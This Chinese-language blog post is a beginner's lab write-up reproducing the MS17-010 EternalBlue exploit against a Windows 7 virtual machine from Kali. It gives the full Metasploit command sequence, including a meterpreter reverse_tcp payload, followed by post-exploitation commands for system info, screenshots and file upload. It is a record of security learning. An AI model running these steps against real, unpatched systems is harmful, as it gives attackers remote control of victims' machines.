admin 管理员组文章数量: 887016
Windows 7 ms17-010永恒之蓝漏洞复现
复现ms17-010漏洞环境:
- VMware Workstation ;
- 攻击机:Kali-Linux ;
- 靶机:Windows 7 ;
使用步骤
1.进入框架:msfconsole
2.使用search命令查找相关漏洞: search ms17-010
3.使用use进入模块:
use exploit/windows/smb/ms17_010_eternalblue
4.设置本机地址:set lhost 192.168.238.130(输入自己本机的IP地址即kali虚拟机地址)
5. 设置靶机地址:set rhost 192.168.238.128(输入靶机的IP地址即Windows 7虚拟机地址)
注意靶机地址和攻击机地址需要在一个网段内
6.设置攻击载荷:
set payload windows/x64/meterpreter/reverse_tcp
7.攻击:exploit / run
8.后渗透阶段
接下来进行操作
首先打开虚拟机kali和Windows 7查询虚拟机地址
在kali中打开Terminal Emulator查询地址:
ifconfig
在Windows 7中打开cmd查询地址:
ipconfig
在攻击机中攻击靶机
1.主机发现
namp进行ip端口扫描
扫描到445端口,而ms17-010永恒之蓝漏洞就是利用445端口的smb服务,操作系统溢出漏洞
2.进入MSF框架
msfconsole
search ms17-010
找到攻击ms17-010漏洞的工具
攻击靶机
use use exploit/windows/smb/ms17_010_eternalblue
/
use 0
设置参数
出现下图情况说明成功
对Windows 7 进行操作
漏洞利用一:显示靶机计算机参数
sysinfo
漏洞利用二:通过meterpreter获取屏幕快照:
screenshot
漏洞利用三:上传文件到Windows 7主机
meterpreter > upload /home/kali/VIYUFgWZ.jpg c:123.jpg
上传成功!
总结
ms17-010 永恒之蓝漏洞复现操作比较简单,本人也是网络安全萌新,写此博客也是为了记录一下复现该漏洞并加深印象,如有错误欢迎各位网安大佬指正,谢谢!
版权声明:本文标题:Windows 7 ms17-010永恒之蓝漏洞复现 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1728518435h1244414.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论